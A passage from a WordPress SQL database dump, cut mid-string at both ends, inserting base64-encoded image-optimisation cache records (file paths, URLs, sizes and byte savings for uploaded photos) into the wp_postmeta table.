jEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEzNjA5LCJ0aW1lIjoxNDgzNTYzNjkyLCJpZCI6MTc4MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjY0NCwidGltZSI6MTQ4MzU2MzY5NiwiaWQiOjE3ODB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1NDMsInRpbWUiOjE0ODM1NjM2OTksImlkIjoxNzgwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjA4LCJ0aW1lIjoxNDgzNTYzNzAyLCJpZCI6MTc4MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE5NTIsInRpbWUiOjE0ODM1NjM3MDYsImlkIjoxNzgwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MzgsInRpbWUiOjE0ODM1NjM3MDksImlkIjoxNzgwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo2MDYsInRpbWUiOjE0ODM1NjM3MTIsImlkIjoxNzgwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo3MTEsInRpbWUiOjE0ODM1NjM3MTYsImlkIjoxNzgwfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODgtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMDYzLCJ0aW1lIjoxNDgzNTYzNzE5LCJpZCI6MTc4MH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTg4LTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04OC05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM4NSwidGltZSI6MTQ4MzU2MzcyMiwiaWQiOjE3ODB9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29196, 1779, 'wpfc_optimisation_reduction', '27643'); 
INSERT INTO `wp_postmeta` VALUES (29197, 1779, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODUuanBnIiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04NS5qcGciLCJ3aWR0aCI6NTE4NCwiaGVpZ2h0IjozNDU2LCJtaW1lX3R5cGUiOiIiLCJlcnJvcl9jb2RlIjo5LCJ0aW1lIjoxNDgzNTYzNzI3LCJpZCI6IjE3NzkifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg1LTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODUtMzQweDM0MC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYXN5cy04NS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6OTQ0LCJ0aW1lIjoxNDgzNTYzNzMwLCJpZCI6MTc3OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04NS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg1LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODUtODAweDUzMy5qcGciLCJyZWR1Y3Rpb24iOjMyNTUsInRpbWUiOjE0ODM1NjM3MzQsImlkIjoxNzc5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODUtNzY4eDUxMi5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYXN5cy04NS03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6Mjk0MywidGltZSI6MTQ4MzU2MzczNywiaWQiOjE3Nzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODUtMTYwMHgxMDY3LmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTg1LTE2MDB4MTA2Ny5qcGciLCJyZWR1Y3Rpb24iOjEzNjI0LCJ0aW1lIjoxNDgzNTYzNzQxLCJpZCI6MTc3OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04NS0yNTB4MjUwLmpwZyIsIndpZHRoIjoyNTAsImhlaWdodCI6MjUwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg1LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODUtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjYzNiwidGltZSI6MTQ4MzU2Mzc0NCwiaWQiOjE3Nzl9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODUtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04NS0yMDB4MjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTg1LTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo1MzcsInRpbWUiOjE0ODM1NjM3NDgsImlkIjoxNzc5fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg1LTIyNXgyMjUuanBnIiwid2lkdGgiOjIyNSwiaGVpZ2h0IjoyMjUsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODUtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYXN5cy04NS0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NjAwLCJ0aW1lIjoxNDgzNTYzNzUxLCJpZCI6MTc3OX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04NS01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg1LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOVwvUmVsZWFzeXMtODUtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjE5NjksInRpbWUiOjE0ODM1NjM3NTUsImlkIjoxNzc5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODUtMTYweDE2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04NS0xNjB4MTYwLmpwZyIsIndpZHRoIjoiMTYwIiwiaGVpZ2h0IjoiMTYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTg1LTE2MHgxNjAuanBnIiwicmVkdWN0aW9uIjo0MjEsInRpbWUiOjE0ODM1NjM3NTgsImlkIjoxNzc5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODUtMjI1eDM2MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04NS0yMjV4MzYwLmpwZyIsIndpZHRoIjoiMjI1IiwiaGVpZ2h0IjoiMzYwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTg1LTIyNXgzNjAuanBnIiwicmVkdWN0aW9uIjo2MDcsInRpbWUiOjE0ODM1NjM3NjEsImlkIjoxNzc5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODUtMzAweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04NS0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTg1LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo3MTYsInRpbWUiOjE0ODM1NjM3NjUsImlkIjoxNzc5fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvUmVsZWFzeXMtODUtNDUweDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9SZWxlYXN5cy04NS00NTB4MzAwLmpwZyIsIndpZHRoIjoiNDUwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL1JlbGVhc3lzLTg1LTQ1MHgzMDAuanBnIiwicmVkdWN0aW9uIjoxMDA5LCJ0aW1lIjoxNDgzNTYzNzY4LCJpZCI6MTc3OX0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg1LTkweDkwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL1JlbGVhc3lzLTg1LTkweDkwLmpwZyIsIndpZHRoIjoiOTAiLCJoZWlnaHQiOiI5MCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9SZWxlYXN5cy04NS05MHg5MC5qcGciLCJyZWR1Y3Rpb24iOjM4MiwidGltZSI6MTQ4MzU2Mzc3MSwiaWQiOjE3Nzl9XQ=='); 
INSERT INTO `wp_postmeta` VALUES (29198, 1778, 'wpfc_optimisation_reduction', '27796'); 
INSERT INTO `wp_postmeta` VALUES (29199, 1778, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODItMi5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyLTIuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU2Mzc3NiwiaWQiOiIxNzc4In0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04Mi0yLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODItMi0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTgyLTItMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjk1NiwidGltZSI6MTQ4MzU2Mzc3OSwiaWQiOjE3Nzh9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODItMi04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyLTItODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA5XC9yZWxlYXN5cy04Mi0yLTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjozMzE4LCJ0aW1lIjoxNDgzNTYzNzgyLCJpZCI6MTc3OH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA5XC9yZWxlYXN5cy04Mi0yLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODItMi03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDlcL3JlbGVhc3lzLTgyLTItNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjI5MzMsInRpbWUiOjE0ODM1NjM3ODYsImlkIjoxNzc4fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDlcL3JlbGVhc3lzLTgyLTItMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOVwvcmVsZWFzeXMtODItMi0xNjAwe